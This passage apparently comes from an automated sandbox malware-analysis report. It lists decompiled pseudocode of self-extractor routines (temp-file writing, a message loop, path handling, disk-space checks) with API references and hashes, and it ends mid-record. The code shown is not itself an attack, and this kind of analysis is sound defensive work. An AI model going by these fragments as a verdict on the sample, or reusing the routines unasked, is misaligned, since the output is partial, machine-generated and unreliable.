                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E00321781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            				E0032658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0x329124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0x329124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x003263cb
                                                                                                                                                                                                                                            0x003263d2
                                                                                                                                                                                                                                            0x003263d8
                                                                                                                                                                                                                                            0x003263ea
                                                                                                                                                                                                                                            0x003263f3
                                                                                                                                                                                                                                            0x00326401
                                                                                                                                                                                                                                            0x00326402
                                                                                                                                                                                                                                            0x00326410
                                                                                                                                                                                                                                            0x00326415
                                                                                                                                                                                                                                            0x00326433
                                                                                                                                                                                                                                            0x00326438
                                                                                                                                                                                                                                            0x00326449
                                                                                                                                                                                                                                            0x00326463
                                                                                                                                                                                                                                            0x0032646d
                                                                                                                                                                                                                                            0x00326477
                                                                                                                                                                                                                                            0x00326477
                                                                                                                                                                                                                                            0x0032647a
                                                                                                                                                                                                                                            0x0032643a
                                                                                                                                                                                                                                            0x0032643a
                                                                                                                                                                                                                                            0x00326444
                                                                                                                                                                                                                                            0x00326444
                                                                                                                                                                                                                                            0x00326492

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0032642D
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0032645B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0032647A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003263EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 1065093856-1116576409
                                                                                                                                                                                                                                            • Opcode ID: dcdff1b5eb49886ac012f6bf6796210255fa60175bd7c4b76076011b8df58efd
                                                                                                                                                                                                                                            • Instruction ID: 2417bd59cb28fe144ad490fba49d2925f88e684b368c3e69e30b10b42086559c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcdff1b5eb49886ac012f6bf6796210255fa60175bd7c4b76076011b8df58efd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921A571A0022CAFD722DF26EC86FEB776CEF49314F104169F585A7180DAB06D958FA4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003247E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                            				void _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                            					_t22 = _t33;
                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t6 =  *_t22;
                                                                                                                                                                                                                                            						_t22 = _t22 + 1;
                                                                                                                                                                                                                                            					} while (_t6 != 0);
                                                                                                                                                                                                                                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                            					 *_t34 = _t24;
                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                            						_t28 = _t33;
                                                                                                                                                                                                                                            						_t19 = _t28 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t9 =  *_t28;
                                                                                                                                                                                                                                            							_t28 = _t28 + 1;
                                                                                                                                                                                                                                            						} while (_t9 != 0);
                                                                                                                                                                                                                                            						E00321680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                            						_t11 =  *0x3291e0; // 0x2b58e90
                                                                                                                                                                                                                                            						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                            						 *0x3291e0 = _t34;
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t25 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            					E003244B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					LocalFree(_t34);
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            				E003244B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x003247e8
                                                                                                                                                                                                                                            0x003247f0
                                                                                                                                                                                                                                            0x003247f4
                                                                                                                                                                                                                                            0x0032480f
                                                                                                                                                                                                                                            0x00324811
                                                                                                                                                                                                                                            0x00324814
                                                                                                                                                                                                                                            0x00324814
                                                                                                                                                                                                                                            0x00324816
                                                                                                                                                                                                                                            0x00324817
                                                                                                                                                                                                                                            0x00324829
                                                                                                                                                                                                                                            0x0032482b
                                                                                                                                                                                                                                            0x0032482f
                                                                                                                                                                                                                                            0x0032484f
                                                                                                                                                                                                                                            0x00324852
                                                                                                                                                                                                                                            0x00324855
                                                                                                                                                                                                                                            0x00324855
                                                                                                                                                                                                                                            0x00324857
                                                                                                                                                                                                                                            0x00324858
                                                                                                                                                                                                                                            0x00324860
                                                                                                                                                                                                                                            0x00324865
                                                                                                                                                                                                                                            0x0032486a
                                                                                                                                                                                                                                            0x0032486f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324876
                                                                                                                                                                                                                                            0x00324831
                                                                                                                                                                                                                                            0x00324841
                                                                                                                                                                                                                                            0x00324847
                                                                                                                                                                                                                                            0x0032480b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032480b
                                                                                                                                                                                                                                            0x003247f6
                                                                                                                                                                                                                                            0x00324806
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00324E6F), ref: 003247EA
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00324823
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00324847
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00324851
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 359063898-1116576409
                                                                                                                                                                                                                                            • Opcode ID: 8331427196459cc6c4518c555f3e04f5829b096d59405ad0710bb0220d4ea0f9
                                                                                                                                                                                                                                            • Instruction ID: 567e0602b42eb5b2bbf7439deff5cea45c9b79e22dcf5774fb2c9d83b6f41223
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8331427196459cc6c4518c555f3e04f5829b096d59405ad0710bb0220d4ea0f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D112579604A516FD7279F24BC18F763B5EEB85310F15851DFE828B341DA369C078660
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00323680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x0032368c
                                                                                                                                                                                                                                            0x0032368f
                                                                                                                                                                                                                                            0x00323691
                                                                                                                                                                                                                                            0x0032369f
                                                                                                                                                                                                                                            0x003236a7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003236ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003236bc
                                                                                                                                                                                                                                            0x003236bc
                                                                                                                                                                                                                                            0x003236c0
                                                                                                                                                                                                                                            0x003236cb
                                                                                                                                                                                                                                            0x003236c2
                                                                                                                                                                                                                                            0x003236c4
                                                                                                                                                                                                                                            0x003236c4
                                                                                                                                                                                                                                            0x003236da
                                                                                                                                                                                                                                            0x003236e0
                                                                                                                                                                                                                                            0x003236e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003236e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003236ba
                                                                                                                                                                                                                                            0x003236ed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0032369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003236B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 003236CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003236DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 2d20f55a2f72683e41e9e6269f38360a45e9bc1d1c6ecf37556ba8f4ea3b423f
                                                                                                                                                                                                                                            • Instruction ID: 915400ac996e6e766e9e836192ab2cb3a4a20bc46a8a08d5f131d9d5336ea47b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d20f55a2f72683e41e9e6269f38360a45e9bc1d1c6ecf37556ba8f4ea3b423f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B01A77290022477DB314BA66C8CEEB767CEBC5B20F01011DF905E2180D564D651C6A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E003265E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x003265e8
                                                                                                                                                                                                                                            0x003265ed
                                                                                                                                                                                                                                            0x003265ef
                                                                                                                                                                                                                                            0x003265f2
                                                                                                                                                                                                                                            0x003265f4
                                                                                                                                                                                                                                            0x003265f4
                                                                                                                                                                                                                                            0x003265f6
                                                                                                                                                                                                                                            0x003265f7
                                                                                                                                                                                                                                            0x00326608
                                                                                                                                                                                                                                            0x00326611
                                                                                                                                                                                                                                            0x00326618
                                                                                                                                                                                                                                            0x0032661c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032660e
                                                                                                                                                                                                                                            0x00326623
                                                                                                                                                                                                                                            0x00326625
                                                                                                                                                                                                                                            0x0032663b
                                                                                                                                                                                                                                            0x0032663b
                                                                                                                                                                                                                                            0x0032663d
                                                                                                                                                                                                                                            0x00326641
                                                                                                                                                                                                                                            0x00326610
                                                                                                                                                                                                                                            0x00326610
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326610
                                                                                                                                                                                                                                            0x00326644
                                                                                                                                                                                                                                            0x00326647
                                                                                                                                                                                                                                            0x00326647
                                                                                                                                                                                                                                            0x00326621
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00322B33), ref: 00326602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00326612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00326629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00326635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: f7eda84e238859c762e2f2be884f95192077d8f07fdbeca6fc557ee52fe4e5c2
                                                                                                                                                                                                                                            • Instruction ID: f2661c044bed96abb5a48d6b938d08b1aa975016ea5d96d894f6b9b482f69859
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7eda84e238859c762e2f2be884f95192077d8f07fdbeca6fc557ee52fe4e5c2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1F028320049606FE7331B28AC898BBBF9CDF8B364F2A01AFE4D282001D6150D0786A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003269B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0x3281f8 = E00326C70();
                                                                                                                                                                                                                                            				__set_app_type(E00326FBE(2));
                                                                                                                                                                                                                                            				 *0x3288a4 =  *0x3288a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0x3288a8 =  *0x3288a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0x328528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0x32851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E00327000();
                                                                                                                                                                                                                                            				if( *0x328000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E00327000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E003271EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x003269b7
                                                                                                                                                                                                                                            0x003269c2
                                                                                                                                                                                                                                            0x003269c8
                                                                                                                                                                                                                                            0x003269cf
                                                                                                                                                                                                                                            0x003269d8
                                                                                                                                                                                                                                            0x003269de
                                                                                                                                                                                                                                            0x003269e4
                                                                                                                                                                                                                                            0x003269e6
                                                                                                                                                                                                                                            0x003269ec
                                                                                                                                                                                                                                            0x003269f2
                                                                                                                                                                                                                                            0x003269f4
                                                                                                                                                                                                                                            0x00326a00
                                                                                                                                                                                                                                            0x00326a07
                                                                                                                                                                                                                                            0x00326a0d
                                                                                                                                                                                                                                            0x00326a0e
                                                                                                                                                                                                                                            0x00326a15

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00326FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00326FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 003269C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 003269D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 003269E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 00326A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: 68fd2101088ae29bc2db762b88cd85341354b52a81e8574dac36cc5503ba2afb
                                                                                                                                                                                                                                            • Instruction ID: a3cf13c8e9c804261e4431ff2ac5bab985488fd25a8e803ce92a87bfe608c29b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68fd2101088ae29bc2db762b88cd85341354b52a81e8574dac36cc5503ba2afb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BEF0ACB050A711DFD77BAB34FD0A6043B69FB05731F204A1DE4619A2F1CF3A9556CA11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00326952(CHAR* __ecx) {
                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                            				if( *__ecx != 0) {
                                                                                                                                                                                                                                            					_t6 =  &_v20; // 0x325760
                                                                                                                                                                                                                                            					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                                                            						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x0032695b
                                                                                                                                                                                                                                            0x00326960
                                                                                                                                                                                                                                            0x00326963
                                                                                                                                                                                                                                            0x00326966
                                                                                                                                                                                                                                            0x00326969
                                                                                                                                                                                                                                            0x0032696c
                                                                                                                                                                                                                                            0x00326972
                                                                                                                                                                                                                                            0x00326987
                                                                                                                                                                                                                                            0x0032699f
                                                                                                                                                                                                                                            0x0032699f
                                                                                                                                                                                                                                            0x00326987
                                                                                                                                                                                                                                            0x003269a7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W2,?,00000000,00325760,?,A:\), ref: 0032697F
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00326999
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                                                                                                                            • String ID: `W2
                                                                                                                                                                                                                                            • API String ID: 1705453755-2327545889
                                                                                                                                                                                                                                            • Opcode ID: 6a2d55e14179f802beae1f631233a7f34a36e5c20c7b9e5f345267723ca35abc
